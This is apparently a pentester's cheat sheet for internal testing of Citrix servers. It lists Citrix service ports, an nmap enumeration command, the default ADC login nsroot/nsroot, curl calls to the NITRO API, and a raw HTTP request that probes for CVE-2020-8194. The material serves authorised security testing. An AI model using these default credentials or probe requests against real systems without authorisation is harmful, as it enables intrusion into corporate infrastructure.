Internal Pentesting Citrix Servers

Citrix Servers - Ports

1604 - Citrix MetaFrame ICA 
1494/tcp  open  citrix-ica       Citrix Metaframe XP ICA - Citrix VDI (Virtual Delivery Agent)
2598/tcp  open  citriximaclient

#Below 4 are used in Load Balancers
3008/tcp open  ssl/midnight-tech?
3009/tcp open  ssl/mep            Citrix NetScaler Metric Exchange Protocol
3010/tcp open  gw?                Citrix NetScaler Gateway
3011/tcp open  mep                Citrix NetScaler Metric Exchange Protocol 


nmap -sS -sU --script citrix-enum-apps,citrix-enum-servers -i ips.txt -Pn -oA citrix


For Citrix ADC - Default Username/Password : nsroot/nsroot

Finding Citrix ADC Version
https://10.10.10.10/nitro/v1/config/nsversion

or

curl -X GET -H "Content-Type: application/json" -u nsroot:examplepassword  http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nsversion

curl -X GET -H "Content-Type: application/json" -u <username>:<examplepassword>  http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nslicense

Testing Citrix ADC  & Citrix Gateway for CVE-2020-8194
This vulnerability is present in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14, and 10.5-70.18.

Send a request as below and see if you can get any nitro errors

POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: ht3yh6sQ
X-NITRO-PASS: q3d15maS
Content-Length: 46

<appfwprofile><login></login></appfwprofile>

POC script on github  - One more